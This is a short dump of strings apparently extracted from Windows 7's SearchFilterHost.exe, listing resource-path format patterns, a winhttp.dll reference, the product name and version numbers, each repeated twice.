%s\%s.mui

%s\%s\%s.mui

%s\%s\%s.mui

%s\%s

%s\%s

winhttp.dll

winhttp.dll

Microsoft Windows Search Filter Host

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

SearchFilterHost.exe

Windows

Windows

7.00.7601.17610

7.00.7601.17610